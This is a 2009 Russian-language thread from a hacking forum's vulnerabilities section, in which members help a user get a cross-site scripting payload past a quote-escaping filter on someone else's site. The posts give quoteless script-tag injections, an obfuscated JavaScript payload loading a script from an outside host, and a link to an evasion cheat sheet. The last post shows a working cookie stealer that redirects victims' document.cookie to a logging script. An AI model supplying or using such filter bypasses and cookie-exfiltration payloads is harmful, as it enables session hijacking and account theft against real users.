HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 23.11.2009, 19:08
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

если есть надпись Microsoft - то явно не просто Mysql, как сам считаешь?
 
Ответить с цитированием

  #2  
Старый 23.11.2009, 19:10
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
С нами: 10660753

Репутация: 676


По умолчанию

Цитата:
Сообщение от Pashkela  
если есть надпись Microsoft - то явно не просто Mysql, как сам считаешь?
а если есть надпись mysqld-4.0.20a-nt ?
 
Ответить с цитированием

  #3  
Старый 23.11.2009, 19:16
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами: 10483586

Репутация: 5826


По умолчанию

Цитата:
Сообщение от Pashkela  
если есть надпись Microsoft - то явно не просто Mysql, как сам считаешь?
http://ru.wikipedia.org/wiki/ODBC - от туда и надпись Microsoft
А БД там MySQL.

Ты так и не научился что либо читать, а по прежнему уверено отвечаешь на вопросы, которые сам не понимаешь.

Последний раз редактировалось Grey; 23.11.2009 в 19:20..
 
Ответить с цитированием

  #4  
Старый 23.11.2009, 22:40
xofffff
Познающий
Регистрация: 16.11.2009
Сообщений: 38
С нами: 8677074

Репутация: 15
По умолчанию

Ситуация в том что я нашел xss но при попытке засунуть ей вот этот скрипт
PHP код:
<SCRIPT type="text/javascript" src="http://your_site.com/js.js"></SCRIPT
Нечего не происходит так как у него фильтр на " и %22 его аналог фильтр заключается в том что перед ним он ставит знак \ а именно
PHP код:
<SCRIPT type=\"text/javascript\" src=\"http://your_site.com/js.js\"></SCRIPT> 
Его можно как нибудь обойти или это все?
просто когда пишешь
PHP код:
<script>alert(document.cookie)</script
Все показывает.
 
Ответить с цитированием

  #5  
Старый 23.11.2009, 23:02
[Forest]
Новичок
Регистрация: 07.11.2009
Сообщений: 23
С нами: 8688843

Репутация: 10
По умолчанию

ставь одинарные кавычки
 
Ответить с цитированием

  #6  
Старый 23.11.2009, 23:17
xofffff
Познающий
Регистрация: 16.11.2009
Сообщений: 38
С нами: 8677074

Репутация: 15
По умолчанию

Опять ставит фильтр
PHP код:
<SCRIPT type=\'text/javascript\' src=\'http://my_site.com/js.js\'></SCRIPT> 

Последний раз редактировалось xofffff; 23.11.2009 в 23:22..
 
Ответить с цитированием

  #7  
Старый 23.11.2009, 23:20
[Forest]
Новичок
Регистрация: 07.11.2009
Сообщений: 23
С нами: 8688843

Репутация: 10
По умолчанию

Цитата:
Сообщение от xofffff  
Опять ставит фильтр
PHP код:
<SCRIPT type=text/javascript src=http://alert.h16.ru/cb/js.js></SCRIPT> 
не уверен быдет ли пахать...

add:

http://sec-123.narod.ru/xss/HTML.txt

Последний раз редактировалось [Forest]; 23.11.2009 в 23:37..
 
Ответить с цитированием

  #8  
Старый 24.11.2009, 00:11
Ins3t
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
С нами: 8850336

Репутация: 330
По умолчанию

2xofffff


Попробуй так:
Код:
<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.$__+$.$$$+"\\"+$.$$$+$.$_$+"\\"+$.__$+$.$_$+$.$$_+$.$$$_+"\\"+$.__$+$.$$_+$.$$$+" \\"+$.__$+$.__$+$.__$+"\\"+$.__$+$.$_$+$.$_$+$.$_$_+"\\"+$.__$+$.$__+$.$$$+$.$$$_+"()\\"+$.$$$+$._$$+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.$__+$.$$$+".\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"\\"+$.$$$+$.$_$+"\\\"\\"+$.__$+$.$_$+$.___+$.__+$.__+"\\"+$.__$+$.$$_+$.___+"\\"+$.$$$+$._$_+"//"+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+".\\"+$.__$+$.$_$+$.___+$.__$+$.$$_+".\\"+$.__$+$.$$_+$._$_+$._+"/"+$.$$__+$.$_$$+"/\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+".\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+"\\\"\\"+$.$$$+$._$$+"\"")())();</script>
Это закодированое

Код:
<script>img=new Image();img.src="http://alert.h16.ru/cb/js.js";</script>
UPD:
Хотя, если двойные кавычки под фильтром, то не выйдет, только что обратил внимание.

Цитата:
<SCRIPT type=text/javascript src=http://alert.h16.ru/cb/js.js></SCRIPT>
Это к стати работает!

Последний раз редактировалось Ins3t; 24.11.2009 в 00:17..
 
Ответить с цитированием

  #9  
Старый 24.11.2009, 00:25
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами: 10340793

Репутация: 66
По умолчанию

Цитата:
Сообщение от Pashkela  
Зато меня искренне радует ваше внимание. Кстати, YuNi|[c - чей смит?
не понял что ты имел ввиду под красным!!!

Цитата:
Сообщение от Ins3t  
2xofffff


Попробуй так:
Код:
<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.$__+$.$$$+"\\"+$.$$$+$.$_$+"\\"+$.__$+$.$_$+$.$$_+$.$$$_+"\\"+$.__$+$.$$_+$.$$$+" \\"+$.__$+$.__$+$.__$+"\\"+$.__$+$.$_$+$.$_$+$.$_$_+"\\"+$.__$+$.$__+$.$$$+$.$$$_+"()\\"+$.$$$+$._$$+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.$__+$.$$$+".\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"\\"+$.$$$+$.$_$+"\\\"\\"+$.__$+$.$_$+$.___+$.__+$.__+"\\"+$.__$+$.$$_+$.___+"\\"+$.$$$+$._$_+"//"+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+".\\"+$.__$+$.$_$+$.___+$.__$+$.$$_+".\\"+$.__$+$.$$_+$._$_+$._+"/"+$.$$__+$.$_$$+"/\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+".\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+"\\\"\\"+$.$$$+$._$$+"\"")())();</script>
Это закодированое

Код:
<script>img=new Image();img.src="http://alert.h16.ru/cb/js.js";</script>
UPD:
Хотя, если двойные кавычки под фильтром, то не выйдет, только что обратил внимание.



Это к стати работает!
Это чем же закодировано? Можно ли потом чтоб обйти двойные кавычки закодироват еще чем нибудь (hex, base64)?

Последний раз редактировалось YuNi|[c; 24.11.2009 в 00:49..
 
Ответить с цитированием

  #10  
Старый 24.11.2009, 01:12
xofffff
Познающий
Регистрация: 16.11.2009
Сообщений: 38
С нами: 8677074

Репутация: 15
По умолчанию

Цитата:
Сообщение от Ins3t  
2xofffff


Попробуй так:
Код:
<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.$__+$.$$$+"\\"+$.$$$+$.$_$+"\\"+$.__$+$.$_$+$.$$_+$.$$$_+"\\"+$.__$+$.$$_+$.$$$+" \\"+$.__$+$.__$+$.__$+"\\"+$.__$+$.$_$+$.$_$+$.$_$_+"\\"+$.__$+$.$__+$.$$$+$.$$$_+"()\\"+$.$$$+$._$$+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.$__+$.$$$+".\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"\\"+$.$$$+$.$_$+"\\\"\\"+$.__$+$.$_$+$.___+$.__+$.__+"\\"+$.__$+$.$$_+$.___+"\\"+$.$$$+$._$_+"//"+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+".\\"+$.__$+$.$_$+$.___+$.__$+$.$$_+".\\"+$.__$+$.$$_+$._$_+$._+"/"+$.$$__+$.$_$$+"/\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+".\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+"\\\"\\"+$.$$$+$._$$+"\"")())();</script>
Это закодированое

Код:
<script>img=new Image();img.src="http://alert.h16.ru/cb/js.js";</script>
UPD:
Хотя, если двойные кавычки под фильтром, то не выйдет, только что обратил внимание.



Это к стати работает!
No input file specified.

Написало когда ввел
Код:
?username='><SCRIPT type=text/javascript src=http://alert.h16.ru/cb/js.js></SCRIPT></script>
и куки написались в строке браузера но в base.php не сохранились

В js.js у меня
PHP код:
location.href =www.site.h16.ru/cb/log.php? + document.cookie
Кстати еще в строке браузера после того как я написал скрипт перешел на страничку слова No input file specified.
Код:
http://hacksite.com/log.php?и тут cookie

Последний раз редактировалось xofffff; 24.11.2009 в 01:23..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...